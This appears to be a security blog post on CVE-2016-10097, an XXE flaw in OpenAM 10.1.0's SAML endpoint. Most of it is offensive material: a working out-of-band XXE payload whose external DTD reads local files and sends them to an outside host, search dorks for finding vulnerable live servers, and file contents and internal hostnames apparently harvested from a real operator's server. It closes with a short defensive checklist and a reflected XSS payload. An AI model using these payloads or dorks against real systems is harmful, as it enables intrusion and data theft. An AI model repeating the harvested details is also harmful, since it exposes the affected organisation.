CVE-2016-10097, XXE, SSO, Open AM 10.1.0, XML Injection, SAML Request Parameter

CVE-2016-10097 – See Also Indicators of Compromise

DORK: “Copyright © 2010 ForgeRock AS, Philip Pedersens vei 1, 1366 Lysaker, Norway”

XML External Entity (XXE) Vulnerability in /SSOPOST/metaAlias/%realm%/idpv2 in OpenAM – Access Management 10.1.0 allows remote attackers to read arbitrary files via the SAMLRequest parameter.

XXE Proof of Concept (PoC) Code for Exploit against Open AM 10.1.0 at the SAML Request Parameter via /SSOPOST/metaAlias/%realm%/idpv2

The Code for CVE-2016-10097
CVE-2016-10097, XML Injection, XXE, Open AM 10.1

<!DOCTYPE data SYSTEM “http://xss.cx/openam101.dtd”><data>&send;</data>

Contents of openam101.dtd:
<!ENTITY % file SYSTEM “file:///proc/meminfo”>
<!ENTITY % all “<!ENTITY send SYSTEM ‘http://xss.cx/?%file;’>”>
%all;

Results:
vmstat
cpu  419311965 4958 41906219 5571468847 1211462 8047 3780040 0 0
cpu0 103233830 1190 8362638 1396465878 301560 1975 552107 0 0
cpu1 102848677 1225 8610282 1397505613 324501 2071 519396 0 0
cpu2 111458378 1316 16816343 1378419372 283117 2061 2203759 0 0
cpu3 101771078 1225 8116954 1399077982 302283 1939 504776 0 0

ctxt 57268543587
btime 1443026641
processes 9102942
procs_running 1
procs_blocked 0
softirq 21376324649 0 1786417168 3049727 3740787123 46379118 0 4661 668387188

This POST is meant to highlight a DORK for XXE bugs in Open AM 10.1.0.

Open Source Software Exploits can often be identified via a well crafted DORK (1) inurl:SSOPOST OR (2) (X-DSAME Version: Release 9.5.1 Build 9.5.1(2010-November-04 13:03).

If you’re new to InfoSec, read this 2013 SlideShare and 2012 USENIX PDF On Breaking SAML: Be Whoever You Want to Be.

Any SSO Provider using an old, out-of-date version of OPEN AM 10.1.0 has an Exploitable SSO based on a simple DORK Search. Sensitive Information is available via XXE!

OPEN AM Version 10.1.0 vulnerable to XXE
OPEN AM V10.1 DORK: “Copyright © 2010 ForgeRock AS, Philip Pedersens vei 1, 1366 Lysaker, Norway

CV InfoSec Team – You had 1 Job

The SAMLRequest parameter is vulnerable to XML external entity injection at /SSOPOST/metaAlias/%realm%/idpv2

First Issue: Contents of /etc/issue – Red Hat Enterprise Linux Server release 6.6 (Santiago)

Comments: Best to look for a new job outside of InfoSec

Second Issue: Listing of /etc/motd – All activity on this system is subject to monitoring.  If information collected reveals possible activity that exceeds privileges, evidence of such activity will be used for further action.  By continuing past this point, you expressly consent to this monitoring.

Comments: No one is monitoring this VM or e-mail to security@

Third Issue: Contents of /tmp:
.ICE-unix
LogProcessor.out
atmail-reporting.log.20160315-0600858563343566468716.log
atmail-reporting.log.20160316-0600687904557808202862.log
clean_photos.out
hsperfdata_jboss
hsperfdata_root
log_rotate_jboss.log
lost+found
nestedjar2380369184215401439.tmp
nestedjar3404424855453741479.tmp

Contents of /tmp/LogProcessor.out
06:00:01 [WARN] – Using db.host: ora1tacap.srv.hcvlny.cv.net
06:00:01 [WARN] – Processing log file: /cust/apache/logs/atmail-reporting.log
06:00:01 [WARN] – Copying to temp file: /tmp/atmail-reporting.log.20160316-0600687904557808202862.log
06:00:01 [ERROR] – Could not read the reporting log
java.io.FileNotFoundException: /cust/apache/logs/atmail-reporting.log (No such file or directory)
at java.io.FileInputStream.open(Native Method)
at java.io.FileInputStream.<init>(FileInputStream.java:106)
at java.io.FileReader.<init>(FileReader.java:55)
at com.cablevision.mobilemail.io.FileProcessor$1.getInput(FileProcessor.java:62)
at com.cablevision.mobilemail.io.FileProcessor$1.getInput(FileProcessor.java:59)
at com.google.common.io.CharStreams.copy(CharStreams.java:154)
at com.cablevision.mobilemail.io.FileProcessor.processFile(FileProcessor.java:59)
at com.cablevision.mobilemail.io.Launcher.main(Launcher.java:66)
06:00:01 [WARN] – Wrote buffer: 0 in 93 millis
06:00:01 [WARN] – Completed.

Comments: Serving your /tmp Directory to an HTTP Post isn’t the desired outcome, you’re doing it all wrong.

Issue Four: Contents of /etc/shells
/bin/sh
/bin/bash
/sbin/nologin
/bin/dash
/bin/ksh
/bin/tcsh
/bin/csh

Comments: BASH is our favorite shell but you probably didn’t expect your bash_history being served over HTTP did you?

Issue Five: You left all the default files available from the Install

DORK Search for /wizard/wizard.jsp
Open AM 10.1 Configuration Wizard
Exposed Open AM 10.1.0 found via DORK Search
OPEN AM Version 10.1.0 Default Admin Page at Installation

Comments: There is no Scanner that can perform proper XXE to get the Keys to the Kingdom automagically. XML Injection done properly is all manual. You’ll need to update SessionID’s, Cookies and other HTTP Headers. Within the SAML, the XML will contain URI and custom resources that will need to be massaged by hand. Don’t push out a huge signature with a Scanner. Even if you get a Bite on XXE in Burp, you’ll need to sit down and do the Exploration and Harvesting by Hand with Burp Repeater and the Command Line, look at the pictures of what can be Harvested below.

XXE IoC’s for InfoSec Teams
1. IS your Server Patched and Up To Date?
2. Are you watching Outbound Connections from the XML Parser?

  • Port 21, 22, 23, 80, 443, 8080, 8443?
  • Are there Established Connections from an XML Host?
  • Did you see /etc/passwd in the GET or POST?
HTTP Logfiles showing an XXE GET containing /etc/passwd

3. Have you disabled External Entity Resolution?

  • Can an Attacker still reference URI’s?
    • What about upgrade history Logs?
Logfiles provide juicy details to identify RCE Endpoints, Server Version ID's and more..
XXE Recon can provide clues to RCE Endpoints. Picture shows JBOSS Web Console recently installed.
      • Do you allow the XML Parser to Serve your ~root/.bash_history too?
XXE test for ~root/.bash_history
XXE Check for contents of ~root/.bash_history
  • Do you know which Directories an Attacker can Read and Exfiltrate via XXE?
External Entity Injection can provide additional Pathways for an Attacker to find an RCE Endpoint
  • Can an Attacker abuse Protocol Handlers?
    • jar:// too?
    • How about those Windows Help Files?
    • Or find out where else you auth?
Information Exposure via LDAP allows an Attacker to gain insight into your Ops
.bash_history can provide additional clue to the Keys to the Kingdom

4. Have you sufficient Permissions on the XML Parser and its UID:GID?

  • To Prevent File System Scanning?
  • To Prevent LAN Scanning?
  • To prevent connecting to localhost?

5. Have you Programmatically disallowed for DNS Lookups from your XML Parser?

  • By modifying the Source

6. Have you recently performed a Manual Engagement with an XML Parser that includes Fuzzing?
(If you’ve answered ‘NO’ to these Questions, its time to look for another Job)

That’s all for today folks!

MS16-035 made Breaking Changes:
External references disabled by default
XPath Transform disabled by default
XSLT Transform disabled by default

Resources:
Open AM V. 10.1 Directory Tree
.NET Signed XML Vulnerability

POST-XSS PoC:
SAMLRequest=<script>confirm(1)</script>